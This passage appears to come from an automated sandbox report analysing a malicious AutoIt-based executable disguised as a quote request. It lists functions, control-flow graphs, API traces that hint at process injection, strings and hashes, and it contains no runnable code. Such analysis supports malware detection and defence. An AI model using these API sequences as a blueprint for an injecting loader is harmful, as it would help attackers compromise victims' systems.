                                                        control_flow_graph 2065 40b3ed0-40b3f7e call 40b18f0 2068 40b3f85-40b3fab call 40b4de0 CreateFileW 2065->2068 2071 40b3fad 2068->2071 2072 40b3fb2-40b3fc2 2068->2072 2073 40b40fd-40b4101 2071->2073 2079 40b3fc9-40b3fe3 VirtualAlloc 2072->2079 2080 40b3fc4 2072->2080 2074 40b4143-40b4146 2073->2074 2075 40b4103-40b4107 2073->2075 2081 40b4149-40b4150 2074->2081 2077 40b4109-40b410c 2075->2077 2078 40b4113-40b4117 2075->2078 2077->2078 2082 40b4119-40b4123 2078->2082 2083 40b4127-40b412b 2078->2083 2084 40b3fea-40b4001 ReadFile 2079->2084 2085 40b3fe5 2079->2085 2080->2073 2086 40b4152-40b415d 2081->2086 2087 40b41a5-40b41ba 2081->2087 2082->2083 2090 40b413b 2083->2090 2091 40b412d-40b4137 2083->2091 2092 40b4008-40b4048 VirtualAlloc 2084->2092 2093 40b4003 2084->2093 2085->2073 2094 40b415f 2086->2094 2095 40b4161-40b416d 2086->2095 2088 40b41ca-40b41d2 2087->2088 2089 40b41bc-40b41c7 VirtualFree 2087->2089 2089->2088 2090->2074 2091->2090 2098 40b404a 2092->2098 2099 40b404f-40b406a call 40b5030 2092->2099 2093->2073 2094->2087 2096 40b416f-40b417f 2095->2096 2097 40b4181-40b418d 2095->2097 2101 40b41a3 2096->2101 2102 40b419a-40b41a0 2097->2102 2103 40b418f-40b4198 2097->2103 2098->2073 2105 40b4075-40b407f 2099->2105 2101->2081 2102->2101 2103->2101 2106 40b40b2-40b40c6 call 40b4e40 2105->2106 2107 40b4081-40b40b0 call 40b5030 2105->2107 2113 40b40ca-40b40ce 2106->2113 2114 40b40c8 2106->2114 2107->2105 2115 40b40da-40b40de 2113->2115 2116 40b40d0-40b40d4 CloseHandle 2113->2116 2114->2073 2117 40b40ee-40b40f7 2115->2117 2118 40b40e0-40b40eb VirtualFree 2115->2118 2116->2115 2117->2068 2117->2073 2118->2117
                                                        APIs
                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 040B3FA1
                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 040B41C7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1748191586.00000000040B1000.00000040.00000020.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_40b1000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CreateFileFreeVirtual
                                                        • String ID:
                                                        • API String ID: 204039940-0
                                                        • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                        • Instruction ID: 9faaf6ba035ae4c8574429a0ff1f913d0b74aeb5d52bf239770ba6591b82dee4
                                                        • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                        • Instruction Fuzzy Hash: 5DA14970E00219EBDB14CFA4C894BEEB7B5FF48304F208559E541BB281D775AA85CF99
                                                        Function 004102B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2119 4102b0-4102c5 SHGetMalloc 2120 4102cb-4102da SHGetDesktopFolder 2119->2120 2121 425dfd-425e0e call 433244 2119->2121 2122 4102e0-41031a call 412fba 2120->2122 2123 41036b-410379 2120->2123 2131 410360-410368 2122->2131 2132 41031c-410331 SHGetPathFromIDListW 2122->2132 2123->2121 2129 41037f-410384 2123->2129 2131->2123 2133 410351-41035d 2132->2133 2134 410333-41034a call 412fba 2132->2134 2133->2131 2134->2133
                                                        APIs
                                                        • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                        • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                        • _wcsncpy.LIBCMT ref: 004102ED
                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                        • _wcsncpy.LIBCMT ref: 00410340
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                        • String ID: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe
                                                        • API String ID: 3170942423-2398878773
                                                        • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                        • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                        • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                        • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                        Function 00401250 Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2137 401250-40125c 2138 401262-401293 call 412f40 call 401b80 2137->2138 2139 4012e8-4012ed 2137->2139 2144 4012d1-4012e2 KillTimer SetTimer 2138->2144 2145 401295-4012b5 2138->2145 2144->2139 2146 4012bb-4012bf 2145->2146 2147 4272ec-4272f2 2145->2147 2150 4012c5-4012cb 2146->2150 2151 42733f-427346 2146->2151 2148 4272f4-427315 Shell_NotifyIconW 2147->2148 2149 42731a-42733a Shell_NotifyIconW 2147->2149 2148->2144 2149->2144 2150->2144 2154 427393-4273b4 Shell_NotifyIconW 2150->2154 2152 427348-427369 Shell_NotifyIconW 2151->2152 2153 42736e-42738e Shell_NotifyIconW 2151->2153 2152->2144 2153->2144 2154->2144
                                                        APIs
                                                          • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                          • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                          • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                        • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                        • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                        • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                        • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                        • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                        • String ID:
                                                        • API String ID: 3300667738-0
                                                        • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                        • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                        • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                        • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                        Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2155 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2158 427190-4271ae RegQueryValueExW 2155->2158 2159 40e4eb-40e4f0 2155->2159 2160 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2158->2160 2161 42721a-42722a RegCloseKey 2158->2161 2166 427210-427219 call 436508 2160->2166 2167 4271f7-42720e call 402160 2160->2167 2166->2161 2167->2166
                                                        APIs
                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                        • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: QueryValue$CloseOpen
                                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                                        • API String ID: 1586453840-614718249
                                                        • Opcode ID: 89069ff54290d95ffeb0e4b83fb23c072447fe8f5d078393e68a3dec861a8096
                                                        • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                        • Opcode Fuzzy Hash: 89069ff54290d95ffeb0e4b83fb23c072447fe8f5d078393e68a3dec861a8096
                                                        • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                        Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                        • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                        • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Window$CreateShow
                                                        • String ID: AutoIt v3$edit
                                                        • API String ID: 1584632944-3779509399
                                                        • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                        • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                        • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                        • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                        Function 040B3CA0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 143fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 040B3B90: Sleep.KERNELBASE(000001F4), ref: 040B3BA1
                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 040B3DBC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1748191586.00000000040B1000.00000040.00000020.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_40b1000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CreateFileSleep
                                                        • String ID: 9NN7ZWYN26GRCNZ5B
                                                        • API String ID: 2694422964-850227698
                                                        • Opcode ID: 96ec2a22317f3e270048a8ffc7e4e20a6526e4376fc6835b13d0e66c423434da
                                                        • Instruction ID: 9b1d671d05829c851a11e5f634ab085e4b56cec90e6062a723c9d8a94f775bb0
                                                        • Opcode Fuzzy Hash: 96ec2a22317f3e270048a8ffc7e4e20a6526e4376fc6835b13d0e66c423434da
                                                        • Instruction Fuzzy Hash: 52517F71E04248EBEF11DBA4CC55BEFBBB9AF04304F104599E648BB2C0D6B91B44CBA5
                                                        Function 00401B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                        • _wcsncpy.LIBCMT ref: 00401C41
                                                        • _wcscpy.LIBCMT ref: 00401C5D
                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                        • String ID: Line:
                                                        • API String ID: 1874344091-1585850449
                                                        • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                        • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                        • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                        • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                        Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                        • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                        • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                        • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Close$OpenQueryValue
                                                        • String ID: Control Panel\Mouse
                                                        • API String ID: 1607946009-824357125
                                                        • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                        • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                        • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                        • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                        Function 040B2B90 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 040B334B
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 040B33E1
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 040B3403
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1748191586.00000000040B1000.00000040.00000020.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_40b1000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                        • Instruction ID: e84fc5bd37a86dea95da6b861c30b4e4e2dafaecab9edd0715d047d8902dc868
                                                        • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                        • Instruction Fuzzy Hash: 90620A30A142589BEB24CFA4C851BDEB372EF58304F1091A9D54DFB390E776AE81CB59
                                                        Function 0040F570 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 247COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                        • _free.LIBCMT ref: 004295A0
                                                          • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                          • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                          • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                          • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                          • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                          • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                        • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe
                                                        • API String ID: 3938964917-3493763051
                                                        • Opcode ID: 8f7df58051baccb1ece1a656c44b13ba1264becb6641c2440e09932015da04d6
                                                        • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                        • Opcode Fuzzy Hash: 8f7df58051baccb1ece1a656c44b13ba1264becb6641c2440e09932015da04d6
                                                        • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                        Function 0040BD80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: Error:
                                                        • API String ID: 4104443479-232661952
                                                        • Opcode ID: 0f3a33fb7be69c8e6baf3b23b87111ea2728d16161c2c78c6bada8bccab6f67e
                                                        • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                        • Opcode Fuzzy Hash: 0f3a33fb7be69c8e6baf3b23b87111ea2728d16161c2c78c6bada8bccab6f67e
                                                        • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                        Function 0040F520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe,0040F545,C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe,004A90E8,C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe,?,0040F545), ref: 0041013C
                                                          • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                          • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                          • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                          • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                          • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                          • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                        • String ID: X$pWH
                                                        • API String ID: 85490731-941433119
                                                        • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                        • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                        • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                        • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                        Function 00401B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 00401B11
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • _memmove.LIBCMT ref: 00401B57
                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
